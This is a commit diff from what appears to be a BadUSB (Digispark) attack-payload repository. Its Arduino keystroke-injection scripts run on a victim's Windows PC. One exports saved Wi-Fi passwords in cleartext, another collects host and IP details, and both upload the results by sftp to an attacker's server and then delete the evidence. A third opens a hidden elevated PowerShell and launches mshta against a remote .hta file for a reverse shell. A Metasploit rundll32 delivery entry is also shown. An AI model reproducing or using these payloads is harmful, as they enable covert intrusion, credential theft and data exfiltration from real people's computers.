Finishing touches

Author: thewhiteh4t

conf/rshell_scripts.json

@@ -38,13 +38,5 @@
 		"msf": 1,
 		"srv": 1,
 		"target": "3"
-	},
-	"rundll": {
-		"desc": "Get Reverse Shell by Abusing Rundll32",
-		"sftp": 0,
-		"module": "exploit/windows/smb/smb_delivery",
-		"msf": 1,
-		"srv": 1,
-		"target": "0"
 	}
 }

scripts/windows/exfil/netinfo.ino

@@ -17,24 +17,27 @@ void loop() {
   DigiKeyboard.delay(1000);
   DigiKeyboard.print("cd $env:temp");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
-  DigiKeyboard.print("$command = {hostname; Get-NetIpaddress | Where PrefixOrigin -EQ DHCP; Invoke-RestMethod http://ipinfo.io/json | Select -exp ip}");
+  DigiKeyboard.print("$cmd = {hostname; Get-NetIpaddress | Where PrefixOrigin -EQ DHCP}");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
   DigiKeyboard.delay(100);
-  DigiKeyboard.print("$command.InvokeReturnAsIs() | Out-File $env:temp/info.txt -Append");
+  DigiKeyboard.print("$cmd.InvokeReturnAsIs() | Out-File $env:temp/netinfo.txt -Append");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
   DigiKeyboard.delay(1000);
   DigiKeyboard.print("sftp USERNAME@IPADDR");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
   DigiKeyboard.delay(1200);
+  DigiKeyboard.print("yes");
+  DigiKeyboard.sendKeyStroke(KEY_ENTER);
+  DigiKeyboard.delay(5000);
   DigiKeyboard.print("PASSWORD");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
   DigiKeyboard.delay(500);
-  DigiKeyboard.print("mput info.txt");
+  DigiKeyboard.print("mput netinfo.txt");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
   DigiKeyboard.delay(1000);
   DigiKeyboard.print("bye");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
-  DigiKeyboard.print("rm info.txt");
+  DigiKeyboard.print("rm netinfo.txt");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
   DigiKeyboard.print("exit");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);

scripts/windows/exfil/wifi_key_grabber.ino

@@ -23,35 +23,26 @@ void loop() {
   }
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
   DigiKeyboard.delay(1000);
-  DigiKeyboard.print("cd C:\\");
+  DigiKeyboard.print("cd %temp%");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
-  DigiKeyboard.delay(100);
-  DigiKeyboard.print("md l");
+  DigiKeyboard.print("@netsh wlan export profile key=clear >nul");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
-  DigiKeyboard.delay(100);
-  DigiKeyboard.print("cd l && @netsh wlan export profile key=clear >nul");
+  DigiKeyboard.print("sftp USERNAME@IPADDR");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
   DigiKeyboard.delay(1000);
-  DigiKeyboard.print("sftp USERNAME@IPADDR");
+  DigiKeyboard.print("yes");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
-  DigiKeyboard.delay(1200);
+  DigiKeyboard.delay(5000);
   DigiKeyboard.print("PASSWORD");
-  DigiKeyboard.delay(70);
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
   DigiKeyboard.delay(500);
-  DigiKeyboard.print("mput C:\\l\\*.xml");
+  DigiKeyboard.print("mput *.xml");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
   DigiKeyboard.delay(1000);
   DigiKeyboard.print("bye");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
   DigiKeyboard.delay(200);
-  DigiKeyboard.print("cd ..");
-  DigiKeyboard.sendKeyStroke(KEY_ENTER);
-  DigiKeyboard.delay(50);
-  DigiKeyboard.print("del 'C:\l'");
-  DigiKeyboard.sendKeyStroke(KEY_ENTER);
-  DigiKeyboard.delay(50);
-  DigiKeyboard.print("j");
+  DigiKeyboard.print("del /f /q /s *.xml >nul");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
   DigiKeyboard.print("exit");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);

scripts/windows/misc/change_wallpaper.ino

@@ -1,16 +1,20 @@
 // Author : thewhiteh4t //
 #include "DigiKeyboard.h"
 void setup() {
-  pinMode(1, OUTPUT);
+	pinMode(1, OUTPUT);
 }
 void loop() {
-  DigiKeyboard.sendKeyStroke(0);
-  DigiKeyboard.delay(3000);
-  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
-  DigiKeyboard.print("cmd /C ""start /MIN powershell iwr -Uri URL -OutFile C:/windows/temp/b.jpg;sp 'HKCU:Control Panel/Desktop' WallPaper 'C:/windows/temp/b.jpg';RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 5""");
-  DigiKeyboard.sendKeyStroke(KEY_ENTER);
-  digitalWrite(1, HIGH);
-  DigiKeyboard.delay(90000);
-  digitalWrite(1, LOW);
-  DigiKeyboard.delay(5000);
+	DigiKeyboard.delay(3000);
+	DigiKeyboard.sendKeyStroke(0);
+ 	DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
+ 	DigiKeyboard.delay(300);
+ 	DigiKeyboard.print("powershell -windowstyle hidden"); 
+  	DigiKeyboard.sendKeyStroke(KEY_ENTER);
+	DigiKeyboard.delay(1000);
+	DigiKeyboard.print("iwr -Uri URL -OutFile C:/windows/temp/b.jpg;sp 'HKCU:Control Panel/Desktop' WallPaper 'C:/windows/temp/b.jpg';RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 5");
+  	DigiKeyboard.sendKeyStroke(KEY_ENTER);
+  	digitalWrite(1, HIGH);
+  	DigiKeyboard.delay(90000);
+  	digitalWrite(1, LOW);
+  	DigiKeyboard.delay(5000);
 }

scripts/windows/reverse_shell/hta_reverse_shell.ino

@@ -8,7 +8,14 @@ void loop() {
   DigiKeyboard.sendKeyStroke(0);
   DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
   DigiKeyboard.delay(300);
-  DigiKeyboard.print("mshta.exe http://SRVHOST:SRVPORT/FILENAME.hta");
+  DigiKeyboard.print("powershell -windowstyle hidden");
+  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT + MOD_SHIFT_LEFT);
+  DigiKeyboard.delay(500);
+  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
+  DigiKeyboard.delay(100);
+  DigiKeyboard.sendKeyStroke(KEY_ENTER);
+  DigiKeyboard.delay(1000);
+  DigiKeyboard.print("mshta.exe http://192.168.0.107:8080/system.hta");
   DigiKeyboard.sendKeyStroke(KEY_ENTER);
   digitalWrite(1, HIGH);
   DigiKeyboard.delay(90000);